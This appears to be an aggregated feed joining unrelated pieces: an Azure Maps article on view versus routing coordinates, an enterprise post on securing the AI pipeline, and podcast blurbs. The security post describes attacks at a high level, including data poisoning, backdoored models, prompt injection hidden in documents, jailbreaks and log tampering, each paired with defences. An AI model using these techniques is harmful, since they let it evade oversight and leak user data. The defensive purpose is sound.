Read more of this story at Slashdot.
When you work with Azure Maps long enough, you will eventually run into a subtle but important detail: the platform returns two different types of coordinates for the same address. And while they may look interchangeable, they behave very differently once you start routing, calculating travel times, or dropping pins on a map.
Let’s break down what each represents and how to use them correctly when building location‑intelligent applications.
Geocoders, including Azure Maps, are designed to satisfy two competing needs:
The coordinate that satisfies the first need is rarely the same answer for the second, in fact it can be wildly off. If you have ever visited a National Park or other large location where the entrance is far from where you would display the center of the park, you will note that the difference between these coordinates can be many miles apart and often you can't drive to the exact center, so we would say the View coordinate is not Routable. So Azure Maps provides them separately; one to power the visual map experience, the other to power the routing engine.
Think of the Azure Maps view coordinate as “the place where the map pin should sit.” It may come from an address parcel, a building footprint centroid, or a point-of-interest geometry. Azure Maps will provide whatever option that produces the most natural visual representation of the feature on the map.
This is the important part for our topic: a view coordinate is not guaranteed to land on a road or even near one. It might be in the center of a large warehouse, deep inside a shopping mall footprint, or somewhere else that makes sense visually but is effectively unreachable from the road network.
View coordinates are great for anything that involves visual context such as placing a point on the map, centering the map on a search result, running spatial clustering on data values, or doing proximity lookups. They’re simply not intended for navigation.
Routing coordinates serve a very different purpose. Azure Maps generates them to represent an access point. The point where a vehicle, pedestrian, or cyclist can legally and realistically approach or leave the location from the road network.
This usually means:
When you're calling Azure Maps Routing APIs—calculateRoute, routeRange, distance matrices, isochrones, multi‑itinerary optimization—you should always feed the routing coordinate into the engine. Feeding a view coordinate instead may cause the service to snap to the wrong part of the network, or worse, find no viable route at all.
Azure Maps surfaces routing coordinates and view coordinates through structured fields in its search and geocoding responses. The naming varies by API, but you will often see:
Azure Maps provides both and should your scenario involve travel movement (even indirectly), the routing coordinate is the authoritative choice.
If you use a view coordinate for routing, you can be asking for routes that terminate inside a building footprint, on the wrong side of the street, or at an incorrect driveway. You might also see unexpected route endpoints because the routing engine is forced to snap the point to whichever road segment it thinks is closest, which might not be the correct one.
On the other hand, if you use a routing coordinate for display, your pins may look "off" because the access point for an address could be far from the building’s center.
This is why the distinction matters: one is about realism, the other about navigability.
When building an end‑to‑end Azure Maps experience, a good mental model is:
That includes distance calculations, service‑area modeling, route planning, delivery optimization, pickup/drop-off flows, fleet operations, and anything else where “how the user gets there” matters just as much as “where it is.”
With this separation of geocode results, you can trust Azure Maps to keep your visual experience clean while ensuring the routing engine has the precision it needs to get users where they actually need to go.
To find out more about Azure Maps Geocoding and our new Azure Maps AutoComplete experience, check out Search for a location using Azure Maps Search services | Microsoft Learn
In our first post, we established why securing AI workloads is mission-critical for the enterprise. Now, we turn to the AI pipeline—the end-to-end journey from raw data to deployed models—and explore why every stage must be fortified against evolving threats. As organizations accelerate AI adoption, this pipeline becomes a prime target for adversaries seeking to poison data, compromise models, or exploit deployment endpoints.
Enterprises don’t operate a single “AI system”; they run interconnected pipelines that transform data into decisions across a web of services, models, and applications. Protecting this chain demands a holistic security strategy anchored in Zero Trust for AI, supply chain integrity, and continuous monitoring. In this post, we map the pipeline, identify key attack vectors at each stage, and outline practical defenses using Microsoft’s security controls—spanning data governance with Purview, confidential training environments in Azure, and runtime threat detection with Defender for Cloud.
Our guidance aligns with leading frameworks, including the NIST AI Risk Management Framework and MITRE ATLAS, ensuring your AI security program meets recognized standards while enabling innovation at scale.
Securing AI isn’t just about protecting a single model—it’s about safeguarding the entire pipeline that transforms raw data into actionable intelligence. This pipeline spans multiple stages, from data collection and preparation to model training, validation, and deployment, each introducing unique risks that adversaries can exploit. Data poisoning, model tampering, and supply chain attacks are no longer theoretical—they’re real threats that can undermine trust and compliance. By viewing the pipeline through a security lens, organizations can identify these vulnerabilities early and apply layered defenses such as Zero Trust principles, data lineage tracking, and runtime monitoring. This holistic approach ensures that AI systems remain resilient, auditable, and aligned with enterprise risk and regulatory requirements.
Sources: enterprise apps, data lakes, web, partners.
Key risks: poisoning, PII leakage, weak lineage, and shadow datasets. Frameworks call for explicit governance and provenance at this earliest stage. [nist.gov]
The Reference Architecture for Zero Trust in AI establishes a security-first blueprint for the entire AI pipeline—from raw data ingestion to model deployment and continuous monitoring. Its importance lies in addressing the unique risks of AI systems, such as data poisoning, model tampering, and adversarial attacks, which traditional security models often overlook. By embedding Zero Trust principles at every stage—governance with Microsoft Purview, isolated training environments, signed model artifacts, and runtime threat detection—organizations gain verifiable integrity, regulatory compliance, and resilience against evolving threats. Adopting this architecture ensures that AI innovations remain trustworthy, auditable, and aligned with business and compliance objectives, ultimately accelerating adoption while reducing risk and safeguarding enterprise reputation. Below is a visual of what this architecture looks like:
Why this matters:
Bottom line, DP is a valuable layer for privacy and resilience, but it must be combined with data validation, anomaly detection, and provenance checks to effectively mitigate poisoning risks. [arxiv.org], [dp-ml.github.io]
Mitigations & Integrations
Use Purview’s automated scanning and classification to detect PII, PHI, financial data, and other regulated fields across your data estate. Apply sensitivity labels and tags to enforce consistent governance policies. [microsoft.com]
Implement Data Loss Prevention (DLP) rules to block unauthorized movement of sensitive data and prevent accidental leaks. Combine this with role-based access control (RBAC) and attribute-based access control (ABAC) to restrict who can view, modify, or export sensitive datasets.
Feed Purview alerts and lineage events into your SIEM/XDR workflows for real-time monitoring. Automate policy enforcement in CI/CD pipelines to ensure models only train on approved, sanitized datasets.
Schedule recurring scans and leverage Purview’s compliance dashboards to validate adherence to regulatory frameworks like GDPR, HIPAA, and NIST RMF.
For externally sourced data, sandbox ingestion and run poisoning heuristics; if using Data Privacy (DP)‑training, document tradeoffs (utility vs. robustness). [aclanthology.org], [dp-ml.github.io]
Attack Scenarios
Mitigations & Integrations
Mitigations & Integrations
Attackers craft malicious prompts or embed hidden instructions in user input or external content (e.g., documents, URLs).
Impact: Can lead to data exfiltration, policy bypass, and unbounded API calls, escalating operational costs and exposing sensitive data.
Mitigation: Implement prompt sanitization, context isolation, and rate limiting.
If model outputs are rendered in applications without proper sanitization, attackers can inject scripts or HTML tags into responses.
Impact: Cross-site scripting (XSS), remote code execution, or privilege escalation in downstream systems.
Mitigation: Apply output encoding, content security policies, and strict validation before rendering model outputs.
Reference: OWASP’s LLM Top 10 lists this as a major risk under insecure output handling. [owasp.org], [securitybo…levard.com]
Malicious or manipulated data introduced during ingestion (e.g., partner feeds, web scraping) skews model behavior or embeds backdoors.
Mitigation: Data validation, anomaly detection, provenance tracking.
Attackers use high-volume queries or gradient-based techniques to extract model weights or replicate functionality.
Mitigation: Rate limiting, watermarking, query monitoring.
Compromise of pre-trained models or fine-tuning checkpoints from public repositories.
Mitigation: Signed artifacts, integrity checks, trusted sources.
Inputs crafted to exploit model weaknesses, causing misclassification or unsafe outputs.
Mitigation: Adversarial training, robust input validation.
Attackers infer PII/PHI from model outputs or embeddings.
Mitigation: Differential Privacy, access controls, privacy-enhanced design.
LLMs calling plugins or APIs without proper sandboxing can lead to unauthorized actions.
Mitigation: Strict permissioning, allowlists, and isolation.
Additional Mitigations & Integrations considerations
Attackers compromise publicly available or third-party pre-trained models by embedding hidden behaviors (e.g., triggers that activate under specific inputs).
Impact: Silent backdoors can cause targeted misclassification or data leakage during inference.
Mitigation:
Malicious actors publish packages with the same name as internal dependencies to public repositories. If build pipelines pull these packages, attackers gain code execution.
Impact: Compromised training or deployment environments, leading to model tampering or data exfiltration.
Mitigation:
If model artifacts (weights, configs, containers) are not cryptographically signed, attackers can replace them with malicious versions.
Impact: Deployment of compromised models or containers without detection.
Mitigation:
Attackers gain access to the model registry and alter metadata or inject malicious artifacts.
Mitigation: RBAC, MFA, audit logging, and registry isolation.
CI/CD pipeline compromised to inject malicious code during model packaging or containerization.
Mitigation: Secure build environments, signed commits, and pipeline integrity checks.
Malicious base images used for model deployment introduce vulnerabilities or malware.
Mitigation: Use trusted container registries, scan images for CVEs, and enforce image signing.
Attackers upload artifacts with similar names or versions to confuse operators and bypass validation.
Mitigation: Strict naming conventions, artifact fingerprinting, and automated validation.
Attackers craft malicious queries or embed hidden instructions in user input or retrieved content to manipulate model behavior.
Impact: Policy bypass, sensitive data leakage, or execution of unintended actions via connected tools.
Mitigation:
Attackers exploit weaknesses in safety guardrails by chaining prompts or using obfuscation techniques to override restrictions.
Impact: Generation of harmful, disallowed, or confidential content; reputational and compliance risks.
Mitigation:
High-volume or structured queries designed to infer model parameters or replicate its functionality.
Impact: Intellectual property theft, exposure of proprietary model logic, and enabling downstream attacks.
Mitigation:
LLM agents calling APIs without sandboxing can trigger unauthorized actions.
Mitigation: Strict allowlists, permission gating, and isolated execution environments.
Unsanitized outputs rendered in apps or dashboards can lead to XSS or command injection.
Mitigation: Output encoding, validation, and secure rendering practices.
Attackers exploit container or VM vulnerabilities hosting inference services.
Mitigation: Harden runtime environments, apply OS-level security patches, and enforce network isolation.
Observing timing, resource usage, or error messages to infer sensitive details about the model or data.
Mitigation: Noise injection, uniform response timing, and error sanitization.
Attackers flood inference endpoints with requests, driving up compute costs.
Mitigation: Quotas, usage monitoring, and auto-scaling with cost controls.
Over time, input data distributions change (e.g., new slang, market shifts), causing the model to make less accurate predictions without obvious alerts.
Impact: Reduced accuracy, operational risk, and potential compliance violations if decisions become unreliable.
Mitigation:
Model performance or decision bias changes for specific demographic or business segments due to evolving data or retraining.
Impact: Regulatory risk (GDPR, EEOC), reputational damage, and ethical concerns.
Mitigation:
Attackers discover new prompt injection or jailbreak techniques that bypass safety filters after deployment.
Impact: Generation of harmful or disallowed content, policy violations, and security breaches.
Mitigation:
Unauthorized or outdated models running in production environments without governance.
Mitigation: Registry enforcement, signed artifacts, and deployment audits.
Backdoors introduced during training activate under rare conditions post-deployment.
Mitigation: Runtime scanning for anomalous triggers and adversarial input detection.
Attackers manipulate monitoring logs or metrics to hide drift or anomalies.
Mitigation: Immutable logging, cryptographic integrity checks, and SIEM integration.
Bots continuously hit inference endpoints, driving up operational costs unnoticed.
Mitigation: Rate limiting, usage analytics, and anomaly-based throttling.
Slow, distributed queries across months to replicate model behavior without triggering rate limits.
Mitigation: Long-term query pattern analysis and watermarking.
Symptom: Model looks great in CI, fails catastrophically on a subset in production.
Likely cause: Attacker tainted validation data so unsafe behavior was never detected. ATLAS documents validation‑stage attacks. [atlas.mitre.org]
Playbook:
Symptom: The assistant “quotes” an external PDF that quietly exfiltrates secrets via instructions in hidden text.
Playbook:
Symptom: Spiky usage, long prompts, and systematic probing.
Playbook:
Data Governance & Provenance
Secure Training
Responsible AI
Runtime Safety & Threat Detection
Enterprise‑grade LLM Access
Monitoring & Continuous Improvement
Azure ML Model Monitoring (drift/quality) + Event Grid triggers for auto‑retrain; instrument with Application Insights for latency/reliability. [learn.microsoft.com]
Align your controls to NIST’s four functions:
Days 0–30: Establish Foundations
Days 31–60: Shift‑Left & Gate Releases
Days 61–90: Runtime Defense & Observability
Q: Do differential privacy and adversarial training “solve” poisoning?
A: They reduce risk envelopes but do not eliminate attacks—plan for layered defenses and continuous validation. [arxiv.org], [dp-ml.github.io]
Q: How do we prevent indirect prompt injection in agentic apps?
A: Combine Spotlighting patterns, Prompt Shields, least‑privilege tool access, explicit consent for sensitive actions, and Defender for Cloud runtime alerts. [techcommun…rosoft.com], [learn.microsoft.com]
Q: Can we use Azure OpenAI without contributing our data to model training?
A: Yes—Azure Direct Models keep your prompts/completions private, not used to train foundation models without your permission; with Data Zones, you can align residency. [learn.microsoft.com], [azure.microsoft.com]
As your organization scales AI, the pipeline is the perimeter. Treat every stage—from data capture to model deployment—as a control point with verifiable lineage, signed artifacts, network isolation, runtime detection, and continuous risk measurement. But securing the pipeline is only part of the story—what about the models themselves? In our next post, we’ll dive into hardening AI models against adversarial attacks, exploring techniques to detect, mitigate, and build resilience against threats that target the very core of your AI systems.
References
#AIPipelineSecurity; #AITrustAndSafety; #SecureAI; #AIModelSecurity; #AIThreatModeling; #SupplyChainSecurity; #DataSecurity
AI tools continue to evolve - what can we do with them today? Richard chats with Cecilia Wirén about her experiences using the latest AI tools to support DevOps workflows, diagnostics, and the crafting of new scripts. Cecilia focuses on tools that can help admins who occasionally work on scripts, including getting into a GitHub workflow to track prompts and results generated by LLMs, so you can always revert and learn from various approaches to interact with these new tools. The tools continue to evolve; it's worth looking at the latest features and models!
Links
Recorded December 3, 2025
Keith Townsend is an independent CTO advisor and infrastructure practitioner focused on how enterprises actually adopt AI, cloud, and open-source platforms at scale. He’s the founder of The Advisor Bench and the voice behind The CTO Advisor, where he helps CIOs and CTOs navigate hard infrastructure decisions around hybrid cloud, AI systems, and platform architecture.
Keith has spent his career inside large enterprises and alongside vendors—working as an enterprise architect, consultant, and analyst—bridging the gap between engineering reality and executive decision-making. He’s known for translating complex systems into plain English and for challenging hype with operational truth.
Today, Keith advises enterprise IT leaders, moderates closed-door executive forums, and builds real AI systems himself—using open source not as ideology, but as a practical tool for control, portability, and long-term leverage.
You can follow Keith on Social Media
https://thectoadvisor.com/
https://www.youtube.com/channel/UCn73v-dZndutgl4s46fJwWw
https://www.linkedin.com/in/kltownsend
https://twitter.com/CTOAdvisor
PLEASE SUBSCRIBE TO THE PODCAST
- Spotify: http://isaacl.dev/podcast-spotify
- Apple Podcasts: http://isaacl.dev/podcast-apple
- Google Podcasts: http://isaacl.dev/podcast-google
- RSS: http://isaacl.dev/podcast-rss
You can check out more episodes of Coffee and Open Source on https://www.coffeeandopensource.com
Coffee and Open Source is hosted by Isaac Levin (https://twitter.com/isaacrlevin)